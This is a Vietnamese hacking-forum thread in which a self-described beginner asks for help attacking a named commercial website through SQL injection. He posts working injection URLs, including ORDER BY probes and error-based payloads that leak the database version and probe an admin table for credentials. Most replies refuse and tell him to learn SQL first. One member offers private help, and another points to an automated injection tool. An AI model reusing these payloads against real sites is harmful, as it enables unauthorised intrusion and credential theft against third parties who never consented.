mong các tiền bối giúp đỡ về lỗi sqli này

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thảo luận thâm nhập

mong các tiền bối giúp đỡ về lỗi sqli này

[Question] mong các tiền bối giúp đỡ về lỗi sqli này	19/12/2011 13:38:29 (+0700) \| #1 \| 251284

iron_man2012
Member

Joined: 18/12/2011 02:01:57
Messages: 6
Offline

em đang tập tành hack web nhưng gặp dạng này em không biết câu lệnh truy vấn kiểu gì mong nhận được chỉ dẫn:
http://www.audiocubes.com/product_info.php?products_id=2315'
nó báo lỗi thế này:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2315''' at line 1

select products_id from products_description where products_name = '2315''

[TEP STOP]
khi em dung câu lệnh :
http://www.audiocubes.com/product_info.php?products_id=2315/**/order/**/by/**/1--
không thấy báo lỗi gì cả.
http://www.audiocubes.com/product_info.php?products_id=2315/**/order/**/by/**/1000--
cũng vẫn bình thường.
vậy các tiền bối có thể chỉ em cách hack cho dạng này được không.
/**/order/**/by/**/.....--
không dùng được để đếm số hay hiện ra thông báo
Unknown column '....' in 'order clause'
hay thay đổi của trang chủ để sủ dụng tiếp câu lệnh :
/**/union/**/select/**/.............--
vậy thì làm thế nào truy vấn được mong các tiền bối góp ý, em xin cảm ơn trước.
tiền bối nào hack được trang này xin commen lại các câu lệnh và cách thức chi tiết cho em học hỏi nhé.

[Question] mong các tiền bối giúp đỡ	19/12/2011 14:01:43 (+0700) \| #2 \| 251286

quanta
Moderator

Joined: 28/07/2006 14:44:21
Messages: 7265
Location: $ locate `whoami`
Offline

/hvaonline/posts/list/13874.html

Let's build on a great foundation!

[Question] mong các tiền bối giúp đỡ	19/12/2011 14:13:56 (+0700) \| #3 \| 251287

iron_man2012
Member

Joined: 18/12/2011 02:01:57
Messages: 6
Offline

em biết mình hỏi không chuẩn lắm chỉ mong nhận được chỉ dẫn để hack tiếp bế tắc thật rồi còn câu hỏi thông minh chắc em không biết mình hỏi sai ở đâu

[Question] mong các tiền bối giúp đỡ về lỗi sqli này	19/12/2011 15:24:54 (+0700) \| #4 \| 251290

peter_nguyen1405
Member

Joined: 30/09/2007 10:20:59
Messages: 43
Offline

Có vẻ như bạn chưa hiểu được ý của Quanta, ở đây không ai chỉ bạn hack cả. Nếu muốn học hack, tự search google hoặc tài liệu bá đạo nào đấy.

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2315''' at line 1

Mình nghĩ cái này là đủ để bạn biết cần bắt đầu từ đâu rồi.

Hãy tìm hiểu về MySQL đi, khi đó tự khắc bạn không cần hỏi

Tất cả chỉ là phỏng đoán - các bác Đao Hạ lưu tình

[Question] mong các tiền bối giúp đỡ về lỗi sqli này	19/12/2011 15:56:08 (+0700) \| #5 \| 251293

iron_man2012
Member

Joined: 18/12/2011 02:01:57
Messages: 6
Offline

Xin lỗi nhưng thảo luận thâm nhập mình hiểu là những ai có kinh nghiệm + kiến thức đã từng (hack) mình nghĩ thâm nhập và hack là một mình không hiểu sao lại không ai dạy mình. Còn tìm hiểu về mysql như bạn bảo thì tìm hiểu cả đời cũng không biết nên bắt đầu từ đâu.4rum la chia sẻ kiến thức thảo luận mà nói không ai dạy vậy các tut sqli trên diễn đàn bộ la post sai 4rum sao.

[Question] mong các tiền bối giúp đỡ về lỗi sqli này	19/12/2011 16:32:28 (+0700) \| #6 \| 251295

Ky0
Moderator

Joined: 16/08/2009 23:09:08
Messages: 532
Offline

iron_man2012 wrote:

Xin lỗi nhưng thảo luận thâm nhập mình hiểu là những ai có kinh nghiệm + kiến thức đã từng (hack) mình nghĩ thâm nhập và hack là một mình không hiểu sao lại không ai dạy mình. Còn tìm hiểu về mysql như bạn bảo thì tìm hiểu cả đời cũng không biết nên bắt đầu từ đâu.4rum la chia sẻ kiến thức thảo luận mà nói không ai dạy vậy các tut sqli trên diễn đàn bộ la post sai 4rum sao.

Có một vài điều bạn nên biết:
=> Nếu bạn không có kiến thức cơ bản thì không ai có thể dạy bạn hoặc có đủ thời gian dạy bạn tất cả các kiến thức liên quan! Cho dù bạn có tham gia bất kỳ nhóm newbie tìm hiều về hack thì cần phải học kiến thức căn bản trước.
=> Do thái độ nóng vội và thiếu kiên nhẫn mới không biết bắt đầu từ đâu. Kiếm một cuốn giáo trình về cơ sở dữ liệu của một số trường ĐH về mà đọc trong đó có đầy đủ các câu lệnh, cấu trúc cú pháp của SQL. Sau đó đọc tài liệu thêm về các loại cơ sở dữ liệu như: MySQL, MSSQL, Oracle ...
=> Đọc và làm theo tut một cách máy móc thì chả khác anh chàng học "Uất ức thần công" đâu.

- Ky0 -

UITNetwork.com
Let's Connect

[Question] mong các tiền bối giúp đỡ về lỗi sqli này	19/12/2011 17:20:57 (+0700) \| #7 \| 251301

iron_man2012
Member

Joined: 18/12/2011 02:01:57
Messages: 6
Offline

thank các tiền bối quan tâm nhưng vấn đề mình muốn hỏi là cách truy vấn lỗi kia mà.Mình có học nhưng cái mình đọc chẳng bao giờ dạy người ta cách truy vấn lỗi bao giờ.Mình chỉ muốn ai đó chỉ cho mình cách truy vấn lỗi với dạng trên thôi.các tiền bối hồi đáp mập mờ quá toàn nói không có kiến thức... điều đó đúng.Vậy nên mình cần ai đó thử truy vấn thâm nhập thử xem liệu có được không và nếu được thì dùng cách nào và chỉ dẫn thế mới gọi là tiền bối.Tìm tài liệu liên quan đến sql thì dễ mà tìm tài liệu về cách thức hack nó thi mình không biết tìm ở đâu.nếu ai có xin chia sẻ link.
Có người lập trình web nhưng chưa hẳn người ta biết hack web.

[Question] mong các tiền bối giúp đỡ về lỗi sqli này	19/12/2011 18:37:08 (+0700) \| #8 \| 251304

n2tforever
Member

Joined: 01/07/2011 15:39:51
Messages: 92
Offline

iron_man2012 wrote:

thank các tiền bối quan tâm nhưng vấn đề mình muốn hỏi là cách truy vấn lỗi kia mà.Mình có học nhưng cái mình đọc chẳng bao giờ dạy người ta cách truy vấn lỗi bao giờ.Mình chỉ muốn ai đó chỉ cho mình cách truy vấn lỗi với dạng trên thôi.các tiền bối hồi đáp mập mờ quá toàn nói không có kiến thức... điều đó đúng.Vậy nên mình cần ai đó thử truy vấn thâm nhập thử xem liệu có được không và nếu được thì dùng cách nào và chỉ dẫn thế mới gọi là tiền bối.Tìm tài liệu liên quan đến sql thì dễ mà tìm tài liệu về cách thức hack nó thi mình không biết tìm ở đâu.nếu ai có xin chia sẻ link.
Có người lập trình web nhưng chưa hẳn người ta biết hack web.

Cậu đã hiểu được bao nhiêu phần trăm về SQL rồi mà dám phát biểu vậy? Khi người ta đã quá nhuần nhuyễn một cái gì đó rồi thì việc tìm những hạn chế của nó và lợi dụng sẽ đến một cách tự nhiên hoặc chí ít cũng rất dễ dàng. hãy học cách sử dụng SQL trước khi học cách hack ok? còn cái mà cậu gọi là hack kia thực chất chỉ là làm theo như một cái máy mà không cần suy nghĩ gì cả việc này một đoạn script là đủ không cần đến 1 bộ óc smilie

[Question] mong các tiền bối giúp đỡ về lỗi sqli này	19/12/2011 18:58:46 (+0700) \| #9 \| 251305

tvv
Member

Joined: 03/06/2011 07:41:21
Messages: 55
Location: TP HCM
Offline

iron_man2012 wrote:

thank các tiền bối quan tâm nhưng vấn đề mình muốn hỏi là cách truy vấn lỗi kia mà.Mình có học nhưng cái mình đọc chẳng bao giờ dạy người ta cách truy vấn lỗi bao giờ.Mình chỉ muốn ai đó chỉ cho mình cách truy vấn lỗi với dạng trên thôi.các tiền bối hồi đáp mập mờ quá toàn nói không có kiến thức... điều đó đúng.Vậy nên mình cần ai đó thử truy vấn thâm nhập thử xem liệu có được không và nếu được thì dùng cách nào và chỉ dẫn thế mới gọi là tiền bối.Tìm tài liệu liên quan đến sql thì dễ mà tìm tài liệu về cách thức hack nó thi mình không biết tìm ở đâu.nếu ai có xin chia sẻ link.
Có người lập trình web nhưng chưa hẳn người ta biết hack web.

1.Bạn trông có vẽ rất ngược ngạo mà thẳng thắng .
Minh thích cái chữ màu vàng và không thích chữ màu cam kia .
2.Đường lối của diễn đàn là chỉ dạy bảo mật , không dạy hack ( để phá phách ).
3.Nếu bạn thật sự muốn học hack thì pm riêng cho ai đó hoặc cho mình cũng được .ebook thì mình có cả đống , nhưng liệu bạn vận dụng được không là chuyện khác . yahoo: ngoc_babyfc92@yahoo.com .

http://www.youtube.com/channel/UCDeTtfediXlQmnw1kdOeHEw?feature=mhee

[Question] mong các tiền bối giúp đỡ về lỗi sqli này	19/12/2011 19:54:24 (+0700) \| #10 \| 251307

iron_man2012
Member

Joined: 18/12/2011 02:01:57
Messages: 6
Offline

thank bạn mình add nick bạn rồi mong được giup đỡ:
đây là 2 link mới mong được chỉ dẫn thêm:
http://www.audiocubes.com/product_info.php?products_id=2315%27%20order%20by%202--+-
http://www.audiocubes.com/product_info.php?products_id=2315%27%20order%20by%201--+-

[Question] mong các tiền bối giúp đỡ về lỗi sqli này	19/12/2011 23:06:07 (+0700) \| #11 \| 251314

iron_man2012
Member

Joined: 18/12/2011 02:01:57
Messages: 6
Offline

nó là v4.1.22
hix:
http://www.audiocubes.com/product_info.php?products_id=2315%27%20or%201%20group%20by%20concat%280x3a,version%28%29,0x3a,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201--+-
tồn tại một tableadmin còn colum username+pas thì mình chịu:
http://www.audiocubes.com/product_info.php?products_id=2315%27%20or%201%20group%20by%20concat%280x3a,%28select%201%20from%20admin%20limit%200,1%29,0x3a,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201--+-
smilie

hack không được nói chi bảo mật chỉ là tìm hiểu thôi anh em cộng tiền bối xin đừng chỉ trích thêm nhé

[Question] mong các tiền bối giúp đỡ về lỗi sqli này	29/01/2012 21:09:57 (+0700) \| #12 \| 252919

wind2115
Member

Joined: 24/12/2010 04:06:41
Messages: 7
Offline

Mình không thích những câu bạn nhắc đến từ " hack " smilie

[Question] mong các tiền bối giúp đỡ về lỗi sqli này	29/01/2012 21:23:40 (+0700) \| #13 \| 252921

xuanphongdocco
Member

Joined: 19/08/2009 08:25:03
Messages: 247
Offline

Tội nghiệp cho những cậu bé.

Dù sao cũng cám ơn chủ thread vì có thêm 1 chỗ để thực hành.

Xuân Phong Nguyễn

[Question] mong các tiền bối giúp đỡ về lỗi sqli này	30/01/2012 10:52:06 (+0700) \| #14 \| 252933

chimung
Member

Joined: 23/10/2008 22:23:45
Messages: 24
Offline

Nếu bạn đủ kiên nhẫn để học thì trước tiên vào http://www.w3schools.com/ để họ về sql là cái gì đã. Học các câu lệnh để sử dụng. Rồi vào hvh.vn để xem hướng dẫn về sqli.
Thực ra cái này là "mì ăn liền". Chẳng tốt đẹp j cả. Bên quản trị cúa site mà chỉnh sửa lại tí là bạn lại ú ớ ngay. Tốt nhất là học từ từ

[Question] mong các tiền bối giúp đỡ về lỗi sqli này	31/01/2012 21:59:34 (+0700) \| #15 \| 252998

chube
Member

Joined: 22/10/2010 02:34:04
Messages: 105
Location: ░░▒▒▓▓██
Offline

- bạn làm mình nhớ tới 1 công cụ 1 thời ( cũng 5 năm rồi :"> smilie

- PRIAMOS -> http://www.priamos-project.com/versions.htm
dowload về rồi reverse nó thử đi ^.^

.-/ / )
|/ / /
/.' /
// .---.
/ .--._\ Awesome Season to hack :') Dont you think so? xD
/ `--' /
/ .---'
/ .'
/

[Question] mong các tiền bối giúp đỡ về lỗi sqli này	01/02/2012 15:18:44 (+0700) \| #16 \| 253013

WinDak
Researcher

Joined: 27/01/2002 11:15:00
Messages: 223
Offline

chube wrote:

- bạn làm mình nhớ tới 1 công cụ 1 thời ( cũng 5 năm rồi :">
- PRIAMOS -> http://www.priamos-project.com/versions.htm
dowload về rồi reverse nó thử đi ^.^

wa, có công cụ này hay nhỉ smilie

), thế mà ngày xưa cứ vất vả tự viết script automate cho nhanh.

p/s: sao moderator không xóa cái trang đang bị lỗi kia đi nhỉ ? khuyến khích member thực tập 'hacking' chăng ?

-- w~ --

Go to:

Users currently in here
1 Anonymous